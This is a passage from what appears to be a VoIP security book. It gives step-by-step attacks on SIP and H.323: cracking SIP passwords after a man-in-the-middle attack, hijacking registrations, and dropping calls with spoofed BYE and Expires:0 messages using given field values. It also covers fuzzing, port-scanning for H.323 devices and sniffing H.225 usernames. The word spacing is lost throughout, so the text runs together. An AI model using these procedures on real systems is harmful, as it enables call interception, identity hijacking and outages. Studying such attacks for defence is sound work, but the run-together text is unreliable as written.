Onecouldalsoperformthesameattack(withoutWiresharkorSIP.Tastic)usingCain&Abel(http://www.oxid.it/cain.html/).Cain&Abelcanperformaman-in-the-middleattack,snifftheSIPauthenticationprocessbetweenaSIPUserAgentandSIPserver,andattempttocrackthepassword.Furthermore,onecouldperformanactivedictionaryattackonSIPusingvnak

(http://www.isecpartners.com/tools.html/),whichwouldchangetheattackfromanofflinedictionaryattacktoapre-computeddictionaryattack.Here'showyouwouldgainaccesstoaSIPpasswordusingCain&Abel:

1. Enablethesnifferand/orperformaman-in-the-middleattackwithCain&Abel.

2. Oncesniffingoraman-in-the-middleattackhasbegun,selecttheSniffertabatthetopoftheCain&AbelprogramandthenthePasswordstabatthebottomoftheprogram.

3. OncethePasswordstabhasbeenselected,highlightSIPintheleft-handcolumnasshowninFigure2-8.

Figure2-8.SIPinformationfromCain&Abel

4. AsSIPauthenticationrequestsaresniffedoverthewire,selectarequesttocrack,right-click,andselectSendtoCracker.

5. SelecttheCrackertabatthetopoftheprogram.

6. HighlightarowthathastheSIPauthenticationinformationsniffedoverthenetwork.

7. Right-clickthehighlightedrowandselectDictionaryattack►Addtoaddalibrarytoperformthedictionaryattackwith,suchasisec.dict.txt.

8. Oncethedictionaryhasbeenselected,selectStartandwaitforCain&Abeltocrackthepassword.

You'redone!

Note✎

Caincanalsoperformabrute-forceattackifyouselectBrute-forceinstep7insteadofDictionaryattack.

Man-in-the-MiddleAttack

Inadditiontoanofflinedictionaryattack,SIPisalsovulnerabletoaman-in-the-middleattack,asshowninFigure2-9.ThisattackusesARPcachepoisoningorDNSspoofingtechniquestoallowtheattackertogetbetweenaSIPserverandthelegitimateSIPUserAgent.Oncetheattackerisroutingtrafficbetweenthetwolegitimateentities,hecanperformaman-in-the-middleattackandauthenticatetotheSIPserverwithoutknowingavalidusernameandpassword.AuthenticatingtotheSIPserversignificantlyincreasestheattacksurfaceofaSIPimplementation.Duringtheattack,asshowninFigure2-9,theattackermonitorsthenetworktoidentifywhenSIPUserAgentssendauthenticationrequeststotheSIPserver.Whentheauthenticationrequestoccurs(step1),heinterceptsthepacketsandpreventsthemfromreachingtherealSIPserver.HethensendshisownauthenticationrequesttotheSIPserver(step2).Usingthechallenge/responsemethodforauthentication,the

Usingthechallenge/responsemethodforauthentication,theSIPserversendsanoncetotheattacker(step3).TheattackerreceivesthenonceandthensendsthesamenoncetothelegitimateUserAgent,whowasattemptingtoauthenticateoriginally(step4).ThelegitimateUserAgentthensendstheattackeravalidMD5hashvaluethatisderivedfromtherealpasswordandSIPserver'snonce(step5),thinkingtheattackeristheactualSIPserver.OncetheattackerhasthevalidMD5digesthashvaluefromthelegitimateUserAgent,hesendsthehashonbehalfofhimselftotheSIPserverandsuccessfullyauthenticates(step6).

Figure2-9.Man-in-the-middleattackwithSIPauthentication

RegistrationHijacking

RegistrationhijackingusesadatedattackclassbutstillworksinmanynewtechnologiessuchasVoIP.TheattacktakesadvantageofaUserAgent'sabilitytomodifytheContactfieldintheSIPheader.

Note✎

Spoofingtheidentityofauserisnothingnew;attackershavebeenspoofingemailsinSMTPmailmessagesformanyyears.ThesameideaappliestoSIPREGISTERorINVITEmessages,whereausercanmodifytheContact

fieldintheSIPheaderandclaimtobeanotherUserAgent.

WhenaUserAgentregisterswithaSIPRegistrar,manythingsareregistered,includingtheUserAgent'spointofcontactinformation.Thepointofcontactinformation,listedintheContactfieldintheSIPheader,containstheIPaddressoftheUserAgent.ThisinformationallowsSIPProxyserverstoforwardINVITErequeststothecorrecthardphoneorsoftphoneviatheIPaddress.Forexample,ifSoniawantedtotalktoKusum,theProxyserversinbothnetworkswouldhavetohavethecontactinformationinordertolocateeachofthem.Figure2-10showsasampleregistrationrequestfromtheSIPUserAgentcalledSonia(noticetheContactfieldfortheuser).

Figure2-10.SIPregistrationrequest

InFigure2-10,therearenocryptographicprotectionsinthepreviousSIPREGISTERrequest.Thisopensthedoorforattackerstospooftheregistrationrequestandhijackthe

identitiesofSIPUserAgents.InordertohijacktheregistrationofaSIPUserAgent,anattackercansubmitthesameregistrationrequestpacketshownpreviouslybutmodifytheContactfieldintheSIPheaderandinsertherownIPaddress.Forexample,ifanattackernamedRainawantedtohijacktheregistrationofausercalledSonia,shewouldreplacetheContactfield,whichcontainsSonia'sIPaddressof192.168.5.122,withherown,whichis192.168.5.126.RainawouldthenspoofaREGISTERrequestwithherIPaddressinsteadofSonia's,asshowninFigure2-11(noticethattheFromfieldstillsaysSonia@192.168.2.101,buttheContactfieldsaysRaina@192.168.5.126).

Figure2-11.SpoofedREGISTERpacket

ThebestmethodofspoofingaSIPmessageiswiththeSiVuStool(http://www.vopsecurity.org/),aVoIPscannerprimarilyusedforSIP-basedimplementations.Amongotherthings,SiVuScandiscoverSIPnetworks,scanSIPdevices,andcreateSIPmessages.ItsabilitytocreateSIPmessagesisveryusefulfortheregistration-hijackingattack.Forexample,here'showyoucoulduseSiVuStospoofaregistrationattackandhijackanotheruser'sidentityontheSIPnetwork.

1. OpenSiVuS.2. UndertheSIPtab,selectUtilities►MessageGenerator.3. IntheSIPMessagesection,entervaluesathroughmfrom

thefollowingtext.Replaceitalictextwiththecorrectvaluesfromyourlocalnetwork.ThevaluesarebasedontheuserRaina'shijackingtheregistrationoftheuserSonia(basedonthelegitimaterequestinFigure2-10).Noticestepminitalicbold,whereRainainsertsherowncontactIPaddress.Sonia'sinformationislistedinstepshandi:a. Method:REGISTERb. Transport:UDPc. CalledUser:Soniad. Domain:192.168.2.102e. Port:49304f. Via:SIP/2.0/TCP192.168.5.122g. Branch:z9hG4bK-d87543-8C197c3ebd1b8855-1-d87543h. To:Sonia<sip:Sonia@192.168.2.102>i. From:Sonia<sip:Sonia@192.168.2.102>j. FromTag:ff761a48k. Call-ID:

845b1f52dd197838MThmMDVhZWRkYZIxMmI1MjNiNDA4MThmYTJiODdiMzM

l. Cseq:1Registerm. Contact:sip:Raina@192.168.5.126

4. ClicktheStartbutton.(TheconfigurationinformationisalsoshowninFigure2-12.)

Figure2-12.SpoofingSIPmessagesusingSiVuS

Beforethepreviousexercisecanhijackasession,theattackerneedstotakethelegitimateuseroffthenetwork.Agoodmethodtodothisisbyde-registeringthelegitimateSIPUserAgentfromtheSIPProxyserver,asdiscussedlaterin"DenialofServiceviaBYEMessage"onSpoofingSIPProxyServersandRegistrars.OncethehijackingattackmessageissubmittedtotheSIPProxyserver,theattackerhassuccessfullyhijackedtheUserAgent'sregistration.

SpoofingSIPProxyServersandRegistrars

ThenumberofSIPspoofingattacksisquitelarge,includingtheabilitytospoofaresponsefromSIPinfrastructureservers,suchasSIPProxyserversandSIPRegistrars.Duringa

registrationrequest,aSIPUserAgentsendsaSIPProxyorRegistrarserveraREGISTERmessage.AnattackercanthensubmitaforgedresponsefromthedomainandredirecttheUserAgenttoaSIPProxyserverorRegistrarthatshecontrols.Forexample,ifaSIPUserAgenttriedtocontacteNapkin.comwiththecontactaddress172.16.1.100,anattackercouldforgetheresponseforeNapkin.com,butwiththecontactaddressof192.168.1.150,aSIPProxy/Registrarthattheattackercontrols.WhenthelegitimateUserAgentwishestocallusersineNapkin.com,theattackercanredirectthecallstoUserAgentshecontrols,therebyreceivingorrecordingphonecallsthatareintendedforsomeoneelse.

DenialofServiceviaBYEMessage

SimilartoH.323andIAXsignalingprotocols,SIPisalsovulnerabletomanyDenialofService(DoS)attacks.ThefirstDoSattacktodiscussissimplyspoofingaBYEmessagefromoneUserAgenttoanother.ABYEmessageissentfromoneusertoanothertoindicatethattheuserwishestoterminatethecallandthusendthesession.Innormalcircumstances,aUserAgentwouldsubmitaBYEmessageoncethecallhasbeencompleted.However,anattackercanspoofaBYEmessagefromoneusertoanotherandterminateanycallinprogress.Beforethisattackcantakeplace,anattackerneedstosniffafewitemsfromanexistingconversationbetweentwoparties(fromanINVITEmessageorsimilar),specificallytheCall-IDandtagvalues.Aftertheattackerhascapturedtheseentitiesoverthenetwork,hecancreateaBYEmessage,forgingtheFromfieldasonesideoftheconversationandaddingthevictimintheTofield.OncetheFromfield(whichistheattacker'sspoofedsourceaddress),theTofield(whichisthevictim),theCall-IDvalue,andtagvaluesareaccurateforthecall,theattackercansendthepacketandthecallwillbeinstantlyterminated(notethatallthisinformationisavailableoverthe

networkincleartext).CompletethefollowingstepstoteardownaSIPsessionbetweentwoentitiesbyusingaBYEmessage:

1. OpenSiVuS.(TheremainderofthestepsareSiVuS-specific.)

2. UndertheSIPtab,selectUtilities►MessageGenerator.3. IntheSIPMessagesection,entervaluesathroughj,

replacingitemsinboldthatcorrespondtoyourlocalnetwork.ThevaluesintheexamplebelowarebasedontheattackerRaina'sterminatingacallbetweenKusumandSonia(basedonthelegitimaterequestinFigure2-10):a. Method:BYEb. Transport:UDPc. CalledUser:Soniad. Domain:192.168.2.102e. Via:SIP/2.0/TCP192.168.5.122f. To:Sonia<sip:Sonia@192.168.2.102>g. From:Kusum<sip:Kusum@192.168.2.102>h. FromTag:ff761a48i. Call-ID:

845b1f52dd197838MThmMDVhZWRkYZIxMmI1MjNiNDA4MThmYTJiODdiMzMj. Cseq:2Bye

4. SelecttheStartbutton.(TheconfigurationinformationisalsoshowninFigure2-13.)

Figure2-13.SIPteardownattackwithSiVuS

NoticeintheConversationLogareainFigure2-13thattheSIPProxyserverreturnsa200OKmessagetotheuser,indicatingthatthespoofedBYEmessagewassuccessfulandthecallwasterminated.TheConversationLogisalsoshownbelow:

SIP/2.0200OKVia:SIP/2.0/TCP192.168.5.122;branch=;received=192.168.5.122From:"iSEC"<sip:Sonia@192.168.2.102>;tag=ff761a48To:"iSEC"<sip:Kusum@192.168.2.102>;tag=as3a9bd758Call-ID:845b1f52dd197838MThmMDVhZWRkYZIxMmI1MjNiNDA4MThmYTJiODdiMzMCSeq:2BYEUser-Agent:AsteriskPBXAllow:INVITE,ACK,CANCEL,OPTIONS,BYE,REFER,SUBSCRIBE,NOTIFYContent-Length:0

AsimilarDenialofServiceattackcanbeconductedwiththeSIPCANCELmethodusingthesamestepsasabove.Insteadofterminatinganexistingcallinprogress,whichispossiblevia

BYE,theCANCELmethodcanbeusedtoexecuteaSIPDoSattackonSIPUserAgentsattemptingtostartacall.Hence,aBYEattackcanbeusedduringacall,andaCANCELattackcanbeusedbeforethecallstarts.

DenialofServiceviaREGISTER

Similartotheregistration-hijackingattack,anattackercanperformaDenialofServiceattackbyassociatingalegitimateUserAgentwithafakeornon-existentIPaddress.Whencallsareredirectedtothenon-existentIPaddress,therewillbenoresponseandthecallwillfail.InordertoperformaDenialofServiceattackviaaREGISTERpacket,anattackercansubmitthesameregistrationrequestpacketshowninFigure2-10butmodifytheContactfieldintheSIPheaderandinsertafake/non-existentIPaddress.Forexample,ifanattackercalledRainawantedtocarryoutaDoSattackontheusercalledSonia,shecouldreplacetheContactfield,whichhasSonia'sIPaddressof192.168.5.122,withafakeonelike118.118.8.118.RainawouldthenspoofaREGISTERrequestwiththefakeIPaddressinsteadofSonia's,asshowninFigure2-14.

Figure2-14.SpoofingContactfieldinSIPmessages

DenialofServiceviaUn-register

OurnextDenialofServiceattackinvolvesun-registeringSIP

UserAgents.Un-registeringmakesitpossibletoremoveaSIPUserAgentfromaProxyserverorRegistrar.Whileun-registeringisnotastandardmethodstatedintheSIPRFC,theabilitytoun-registeraUserAgentissupportedbyafewSIPdevices.

Note✎

Theun-registrationprocesshasnothingtodowithanexistingcallandshouldnotbeconfusedwiththeSIPBYEmethod.

Theproblemwiththeun-registrationmethodisthatauthenticationisusuallynotrequiredtoremoveaUserAgentfromaSIPProxyserverorRegistrar.Hence,ifaSIPUserAgentislegitimatelyregisteredtoaSIPProxyserver,anattackercansimplyattempttoun-registertheUserAgent.Inordertoun-registeraUserAgent,theREGISTERmethodisused(thereisnoUNREGISTERmethodinSIP).WhensendingtheREGISTERmethod,insteadofplacingastandardexpirationvalueinthepacket(ExpiresvalueintheSIPheader),suchas3600or7200,theattackersetsthevaluetozero.TheattackerthensendstheREGISTERpacketwiththeExpiresvaluesettozerototheSIPProxyserverorRegistrar,whichtellstheservertoun-registertheUserAgentimmediately.ThelegitimateUserAgentcanattempttore-register,buttheattackercansimplysendanotherUDPpacketandimmediatelyun-registerit.BecausetheattackinvolvesonlyoneUDPpacket,theattackercanexecutetheun-registrationprocessonceeveryfewminutesforanindefiniteperiodoftime.ThiswillpreventthelegitimateSIPUserAgentfromregisteringtotheSIPProxyserverorRegistrar.Furthermore,thisattackcanbeusedinconjunctionwiththeregistration-hijackingattackdiscussedpreviously.Here'showtoun-registeraSIPsessionbetweentwoentities:

1. OpenSiVuS.

2. UndertheSIPtab,selectUtilities►MessageGenerator.3. IntheSIPMessagesection,enterthecorrectvaluesinall

fieldsfortheREGISTERmessage.Valuesathrulcanbeenteredfromthefollowinglist,replacingallitemsinitalicfromyourlocalnetwork.TheexamplebelowisbasedontheattackerRaina'sterminatingacallbetweenKusumandSonia(basedonthelegitimaterequestinFigure2-10).Noticestepl,wheretheExpiresvalueissettozero:a. Method:REGISTERb. Transport:UDPc. CalledUser:Soniad. Domain:192.168.2.102e. Via:SIP/2.0/TCP192.168.5.122f. To:Sonia<sip:Sonia@192.168.2.102>g. From:Kusum<sip:Kusum@192.168.2.102>h. FromTag:ff761a48i. Call-ID:

845b1f52dd197838MThmMDVhZWRkYZIxMmI1MjNiNDA4MThmYTJiODdiMzM

j. Cseq:1REGISTERk. Contact:*l. Expires:0

4. SelecttheStartbutton.(TheconfigurationinformationisalsoshowninFigure2-15.)

FuzzingSIP

Fuzzingistheprocessofsubmittingrandomdatatoaprotocolorapplicationinordertocauseittofail.Iftheprogramfails(crashes),securityissuesmaybeidentifiedatfailurepointswithintheprotocolorapplication.TheSIPprotocolcanbefuzzedtotesttherobustnessofavendor'simplementationof

SIP.Forexample,iftheprotocolcannotdefendagainstcommonfuzzingtechniques,theavailabilityoftheVoIPnetworkcouldbeaffected.

Figure2-15.Un-registeringSIPUserAgents

ThePROTOSproject(http://www.ee.oulu.fi/research/ouspg/protos/testing/c07/sip/index.html/hasaSIPfuzzingtoolthatcanbeusedtotestaVoIPnetworkthatusesSIP.We'llusethePROTOStooltofuzztheSIPprotocolasfollows:

1. Downloadthefuzzer(aJava.jarfile)fromhttp://www.ee.oulu.fi/research/ouspg/protos/testing/c07/sip/c07-sip-r2.jar/.You'llneedtohaveaJavaVMrunningonyouroperatingsystem.

2. Enterthefollowingonthecommandlineinordertogetthe

optionsforthetool:java-jarc07-sip-r2.jar

3. InordertotestaSIPProxyserver/RegistrarwiththeIPaddressof192.168.11.17,enterthefollowingonthecommandline:

java-jarc07-sip-r2.jar-touri1108@192.168.11.17-dport5060

AsshowninFigure2-16,thefuzzerwillrunthroughallitstestcasesonebyone.IftheSIPProxyserver/Registrarfails,thefuzzermayhavefoundasecurityissuewithit.(Itisneitherquicknoreasytofindasecurityissuewithfuzzing,butitisthefirststepofamultiple-stepapproach.)

Figure2-16.FuzzingSIP-id001

SummarySIPisemergingasamajorsignalingprotocolinVoIPinfrastructures,especiallyonPC-basedsoftphones.BecauseSIPislargelybasedonHTTP,itisprobablythemostseamlessprotocoltobeusedwithIPnetworks.Bythesametoken,itinheritsquiteafewofHTTP'ssecurityexposures.Aswehaveseen,SIP'sauthenticationmethodsarevulnerabletoseveralattacks,includingpassivedictionaryattacks.SIP'sauthenticationmodelalsoallowsattackerstoretrievetheUserAgent'spasswordquiteeasily.Furthermore,theidentityofanySIPUserAgentcannotbetrustedbecauseattackerscanhijackregistrationattemptsoflegitimateSIPdevices.ThereliabilityoftheSIPnetworkleavesmuchtobedesired.WehavediscussedonlyafewofthelargeamountofDenialofServiceattacksagainstSIPUserAgentsandservers.Voicecommunications,including911calls,requireahighlevelofreliability.ManySIPentities,includinghardphones,softphones,gateways,andbordercontrollers,arequiteeasytotakeoffline,cutoff,orsimplyensurethatnocommunicationtakesplace.WhenbuildingaVoIPnetworkusingSIP,itisimportanttoknowaboutthemajorproblemswithauthenticationandreliability.ThischapterhasfocusedonSIP'sflawsinordertohelporganizationsunderstandtherisks.Chapter9willdiscussthedefensesforVoIPcommunication,includingtheuseofSSIP(SecureSIP).

Chapter3.SIGNALING:H.323SECURITYH.323,anInternationalTelecommunicationUnion–TelecommunicationStandardizationSector(ITU-T)standard,isaverycommonsignalprotocolusedonVoIPnetworks.Asasignalingprotocol,itisusedforregistration,authentication,andestablishingendpointsonthenetwork.SimilartoSIP,H.323handlessignalingandreliesonRTPformediatransfer(discussedinChapter4).However,H.323isasystemspecificationcomprisingseveralotherITU-Tprotocols,includingH.225(managesregistration,admission,andstatus),H.245(thecontrolprotocol),H.450(offerssupplementaryservices),H.235(providessecurityservicesforbothsignalingandmediachannels),H.239(offersdualstreaming),andH.460(allowsfirewalltraversal).ManyVoIPdeploymentsuseH.323becauseitcanintegratebetterwithexistingPBXsystemsandoffersstrongerreliabilitythanSIP.FormoreinformationontheH.323standard,refertohttp://www.itu.int/rec/T-REC-H.323-200606-I/en/.ThischapterisdedicatedtoH.323securityasitpertainstoVoIP.TheemphasiswillbeonH.323'ssubprotocols,specificallytheonesthatmanageauthenticationandauthorizationforH.323endpoints(e.g.,hardphones).ThechapterwillalsocoverthebasicsofH.323securityandH.323attacks,includingauthentication,authorization,andDenialofService(DoS).

H.323SecurityBasicsThekeypartsofanH.323VoIPnetworkareendpointsanddevices,includinggatekeepers,mediaproxies,gateways,andbordercontrollers.H.323gatekeepersregisterandauthenticateH.323endpoints.TheyalsostoreadatabaseofallregisteredH.323clientsonthenetwork.H.323gateways,ontheotherhand,aredevicesthatroutecallsfromoneH.323gatekeepertoanother,whileSessionBorderControllershelp

VoIPnetworkscommunicatearoundnetworkfirewalls.RefertoChapter1formoreinformationoneachofthesedevices.ThefollowingarethecoresecurityaspectsofH.323thatwillbediscussedinthissection:

Enumeration(identifyingH.323devices)Authentication(H.225)Authorization(E.164alias)

Enumeration

Aneffectivewaytoenumerateaparticulartypeofdeviceonanetworkistoperformaportscan.Forexample,awebservercanbeenumeratedbythepresenceofport80.Table3-1liststhepossibleportsthatanH.323endpointordevicecouldbelisteningon.Whilesomeoftheportsarestatic,suchasTCPports1718,1719,and1720,manyarenot.Afterasessionhasbeeninitialized,H.323oftenneedsadynamicsetofportsbetweentheH.323endpointandgatekeeper.TheportscanbeanywherebetweenTCP1024and65535,whichisamajorreasonfirewallteamsdislikeVoIP.(VoIPandfirewallswillbediscussedinChapter9.)Table3-1.H.323Ports

Port Description StaticorDynamic

80 HTTPManagement Static

1718 GatekeeperDiscovery Static

1719 GatekeeperRAS Static

1720 H.323CallSetup Static

1731 AudioControl Static

1024-65535 H.245 Dynamic

1024-65535 H.245 Dynamic

1024,1026,…,65534(even) RTP(Audio/Video) Dynamic

RTPport+1(odd) RTCP(Control) Dynamic

CompletethefollowingexercisetoenumerateH.323devicesonanetwork.

1. DownloadNmapfromhttp://insecure.org/nmap/.2. Typenmap.exeonthecommandlinetoretrievethesyntaxof

thetool.3. Typethefollowingonthecommandlinetoenumerate

H.323endpointsandgatekeepers:nmap.exe-sT-p1718,1719,1720,1731IPAddressRange

ForaclassBnetworkon172.16.0.0network,typethefollowing:

nmap.exe-sT-p1718,1719,1720,1731172.16.0.0/16

AllIPaddressesthatshowopenintheSTATEcolumnareprobablyH.323devices.SeeFigure3-1foranexampleinwhich172.16.1.107seemstobeanH.323device.

Figure3-1.EnumeratingH.323entities

OnceanH.323device,suchasagatekeeper,hasbeenidentifiedonthenetwork,anH.323endpointcanregistertoit.Often,enterprisedeploymentsofH.323donotrequireauthenticationforH.225registration;hence,anattackercansimplydownloadtheH.323endpointofhisorherchoiceandregisterwiththegatekeeper.OnceanH.323endpointregisterstoagatekeeper,allavailableH.323information(suchasotherendpointsonthenetwork)canbeenumerated.Thisallowsanyanonymous,unauthorizedusertofindallH.323entitiesonthenetwork,includingE.164aliasesforspoofingattacks(discussedlaterinthischapter).CompletethefollowingexercisetoregisterwithanH.323gatekeeper.

1. DownloadPowerPlay(http://www.bnisolutions.com/products/powerplay/ipcontact.html/oryourfavoriteH.323client.

2. OpenPowerPlaybychoosingStart►Programs►PowerPlay►PowerPlayControlPanel.

3. SelecttheGatekeepertab.4. Inthemiddleofthescreen,thereisatextboxwithtwo

options—oneistoautomaticallydiscoverH.323gatekeepers,andtheotherisforstaticallysettingthegatekeeperaddress.TypetheIPaddressofanynodethathadport1719openfromtheportscanresults.Alternatively,selectAutomaticDiscovery,andPowerPlaywillfindtheH.323gatekeepersautomatically.

5. Oncethegatekeeperisenteredintothetextbox,clickOK.ThePowerPlayiconinthetaskbarwillturngreenonceithasregisteredwiththegatekeeper(assumingauthenticationhasnotbeenenabled,whichisthenorm).

Done!YouhavenowenumeratedH.323gatekeepersonthe

networkandsuccessfullyregisteredyourH.323client.Atthispoint,voicecallstootherH.323clientscanbeperformed.Additionally,enumerationoftheVoIPnetworkcannowoccur,providingyouwithE.164aliasesandphonenumbers.IftheH.323gatekeeperonthenetworkrequiresauthentication,considerusingEkiga(http://ekiga.org/),analternativeH.323clientthathasauthenticationsupport.CompletethefollowingexercisetoregisterwithanH.323gatekeeperthatrequiresauthentication.

1. DownloadandinstallEkigafromhttp://ekiga.org/.2. OpenEkigabychoosingStart►Programs►Ekiga►Ekiga.3. SelectEdit►Accounts►Add.4. Enterthefollowinginformation:

a. AccountName:AccountNameb. Protocol:H.323c. Gatekeeper:IPaddressofgatekeeperfoundwiththeport

scan

d. User:Usernamefortheaccounte. Password:Passwordfortheaccount

Authentication

H.323endpointscanusethreedifferentmethodsforauthentication:symmetricencryption,passwordhashing,andpublickey.

SymmetricEncryption

SymmetricencryptionusesasharedsecretbetweentheH.323endpointandgatekeeper.EachendpointhasaGeneralIDsetupbeforehand,whichalongwiththereceiver'sGeneralID,atimestamp,andarandomnumberisencodedbythesecretkey

(derivedfromthesharedsecret).ThisCryptoTokenisthensenttotheauthenticatingdevice.Theauthenticatingdeviceperformsthesamefunctionandchecksthattheitemsmatchtodetermineiftheregistrationissuccessful.

PasswordHashing

Thesecondmethodforauthenticationispasswordhashing.H.323endpointsuseausername(H.323IDorGeneralID)andpassword(viaH.225)forH.323devices,suchasamediagatewayormediaproxy.Inordertoprotecttheendpoint'spassword,itisnotsentoverthenetworkincleartext.ThepasswordishashedusingtheMD5hashingalgorithm.However,becausecreatinganMD5hashofjustthepasswordwouldmaketheauthenticationmethodvulnerabletoareplayattack,thepasswordiscombinedwiththeusername(H.323IDorGeneralID)andanNTPtimestampinordertomakethehashuniqueforeachauthenticationrequest.Thetimestamp,username,andpasswordareASN.1-encodedindividuallyandthencombinedtocreateanASN.1buffer.TheASN.1bufferisthenhashedusingMD5andsenttothegatekeeper.

Note✎

ASN.1(AbstractSyntaxNotationOne)isasetofencodingrulesthattransformdataintoastandardformatforlaterabstraction.ASN.1-encodeddatacanbedecodedbyanyentitythathasASN.1support,whichareanyH.323endpoints,gateways,andgatekeepers.H.323usesASN.1andPER(PackedEncodingRules)toreducepacketsizeforlow-bandwidthnetworksand/oroptimalthroughput.

OncethegatekeeperhastheMD5hash,itcanperformthesamefunctionastheH.323endpointinordertoensurethattheendpointhasthecorrectpassword.Thegatekeeperperformsthesamehashingexercise,usingtheASN.1-encoded

username,password,andtimestamp(fromtheNTPserver)toseeifbothhashesmatch.Iftheydo,thegatekeeperknowsthattheH.323endpointhasusedthecorrectpassword.Ifthehashesdonotmatch,thegatekeeperknowsthatthepasswordusedbytheendpointisnotcorrectandtherefore,theendpointisnotauthenticated.Figure3-2illustratestheauthenticationprocesswithH.225.InFigure3-2,anexampleauthenticationprocessisshownbetweenanH.323endpointandauthenticator,suchasagatekeeper.Thestepsareasfollows:

1. TheH.323endpointrequestsauthentication.2. BothentitiesgetthetimestampfromtheNTPserver,which

isbasedonthetimeelapsedinsecondsfromJanuary1,1970.

3. TheendpointASN.1encodesitsusername,password,andNTPvaluesindividuallyandthencreatesanASN.1buffer.

4. TheASN.1bufferisusedtocreatetheMD5hash(identifiedascryptoEPPwdHashinthepacket),whichisthensenttothegatekeeper.

Figure3-2.H.323authenticationprocess

5. Thegatekeeper,whichalreadyknowstheusernameandpassword,retrievesthetimestampinformationfromthe

NTPservertoperformthesameexercise.IftheMD5hashcreatedbythegatekeepermatchestheMD5hashthattheH.323endpointsentoverthenetwork,thegatekeeperknowsthatthepasswordiscorrectandcanthenauthenticatetheendpoint.

Ofalltheauthenticationmethods,passwordhashingseemstobethemostcommon,butit'salsovulnerabletoafewattacks(asdiscussedin"H.323SecurityAttacks"onH.323SecurityAttacks).

PublicKey

Thelastmethodofauthenticationispublickey.ThismodelusescertificatesinsteadofsharedsecretslocatedontheendsoftheH.323authenticationprocess.Thismethodisthemostsecureforauthentication,butitisalsothemostcumbersomebecauseoftheuseofcertificatesoneachendpointoftheVoIPnetwork.

Authorization

H.323endpointsuseanE.164aliasforidentification.TheE.164aliasisaninternationalnumbersystemthatcomprisesacountrycode(CC),optionalnationaldestinationcode(NDC),andasubscribernumber(SN).AnE.164aliascanbeupto15numericvaluesinlength,setdynamicallybyagatekeeperorlocallybytheendpointitself.TheE.164aliasiscommonlyusedastheprimaryidentifierforH.323endpoints.Thealiasisalsousefulforsecurity,asaliasescanbegroupedfordifferentcallprivileges.Forexample,onespecificsetofE.164aliasescanbeallowedtoregistertogatekeepersandmakecallsanywhere(e.g.,aliasesstartingwith510),whileadifferentgroupofE.164aliasesmightbeauthorizedtoregisteranddialinternalnumbers(e.g.,aliasesstartingwith605).Yetanothersetofaliasesmightbeabletocallexecutiveconferencebridges(e.g.,aliasesstartingwith

415).Figure3-3showshowE.164aliasescanbeusedtocontroldial-outproceduresbyH.323endpoints.

Figure3-3.E.164aliasforsecuritycontrols

Figure3-3showsanexampleauthorizationprocessbetweengatekeepersthatpermitaccesstocertaintypesoffunctionsbasedontheE.164alias.ThegatekeeperallowsonlyoutboundinternationalcallstoagroupA,unlimitedinternalcallstogroupB,andcallstotheexecutiveconferencebridgetogroupC.

Note✎

Whenitcomestosecurity,E.164aliasescanbeconsideredsimilartoaMACaddressonEthernetcards.MACaddressfilteringisoftenusedonEthernetswitchestolimitaccesstocertainpartsofanetwork.WhileE.164aliasarenotMACaddressequivalents(endpointsstillhavetheirownEthernetMACaddresses),theE.164aliasisusedasatrustedidentifierforH.323endpoints.

H.323SecurityAttacksH.323endpointsuseH.225'sRegistrationAdmissionStatus(RAS)formanysecurityitems,includingauthenticationandregistrationfunctions.RASservicesallowendpoints,gatekeepers,andgatewaystochatterwithoneanotherinordertoensurethateachdeviceisregistered,cantalkappropriately,andisstillalive.Itemslikeregistrationconnectivity,bandwidthchanges,active/non-activestatus,andun-registrationsbetweenendpoint/gatekeepersoccurwiththeuseofRAS.Intermsofsecurity,RAShandleskeycomponentsforH.323networks.Forexample,whenanH.323endpointisconnectedtothenetwork,itmustuseRAS'sregistrationfunctiontospeakintheVoIPenvironment.IftheendpointisunabletoregisterorcannotregisterviaRAS,theendpointissimplynotthere.RASalsohandlesauthenticationforH.323.Onceanendpointisregistered,theendpoint'susername/passwordisconfirmedto/fromthegatekeeper.AfterregistrationandauthenticationhaveoccurredviaRASonH.323VoIPnetworks,endpointscanstartmakingorreceivingphonecalls.BeforetheRASservicesareimplemented,neithercanhappen.H.225'sregistration(authentication)processdoesprotectthepasswordagainstcommonsniffingattacks,becauseitdoesnotsendthepasswordacrossthenetworkincleartext.Unfortunately,H.225isstillvulnerabletomanysecurityattacks.Theattacksthatwillbediscussedare:

Usernameenumeration(H.323ID)H.323passwordretrieval(offlinedictionaryattack)ReplayattackonH.225authenticationH.323endpointspoofing(E.164alias)E.164aliasenumerationE.164hoppingattacks

DenialofServiceviaNTPDenialofServiceviaUDP(H.225registrationreject)DenialofServiceviaH.225nonStandardMessageDenialofServiceviaHostUnreachablepackets

UsernameEnumeration(H.323ID)

WhenauthenticationisrequiredbetweenagatekeeperandanH.323endpoint,theH.323endpointwillsenditsusernameandpasswordtotheauthenticatingdevice,asnotedinthearchitecturedescribedinFigure3-2.InordertocapturetheusernameusedbytheH.323endpoint,anattackercansimplysniffthenetworkandcapturetheusernameincleartext.Aswitchednetworkprovideslittleprotectionasanattackercanperformaman-in-the-middleattackandcapturealltheH.225usernameswithinthelocalsubnet.Severalattackscanbeattemptedbyanattackeroncetheusernamehasbeencaptured,includingbrute-forceattacks.Wiresharkcanbeusedasthesnifferprogramtocapturetheusername,whichwillbenotedastheH.323-IDundertheH.225.0RASsectionofthepackettrace.CompletethefollowingexercisetosnifftheH.225usernameduringtheauthenticationprocessoftwoH.323devices.

1. EnsurethattheH.323gatekeeperhasbeenenabledonyourlabnetwork.

2. OpenyourfavoriteH.323client.3. OpenWiresharkfornetworksniffingbychoosingStart►

Programs►Wireshark►Wireshark.4. Fromthemenubar,selectCapture►Interfaces►Prepare.5. SelectUpdateslistofpacketsinrealtime,thenselectStart.6. FromtheH.323endpoint,connecttotheH.323gatekeeper

usingEkigabyenteringitsIPaddressintheappropriate

location.Furthermore,ensurethatthecorrectusernameandpasswordhavebeenenteredforH.225authentication.(Inourexample,theH.323endpointusestheusernameofUSER.)

7. OncetheH.323endpointisconnectedtoH.323gatekeeper,stopsniffingonWireshark.

8. UsingWireshark,scrolldownandselectapacketthathastheProtocollabelofH.225.0andtheInfodescriptionasRAS:RegistrationRequest(asshowninlinenumber4950inFigure3-4).

Figure3-4.WiresharkandH.225packets

9. IntheprotocoldetailssectionofWireshark(middlesection),expandthefollowing:H.225.0RAS►RASMessage:registrationRequest►registrationRequest►cryptoTokens►Item0►Item:cryptoEPPwdHash►cryptoEPPwdHash►alias:H.323-ID►H323.ID:[USERNAME]TheentrylabeledH323.ID:[USERNAME]istheusernameoftheH.323endpoint,whichisshownasUSERincleartext,asyoucanseeinFigure3-5.

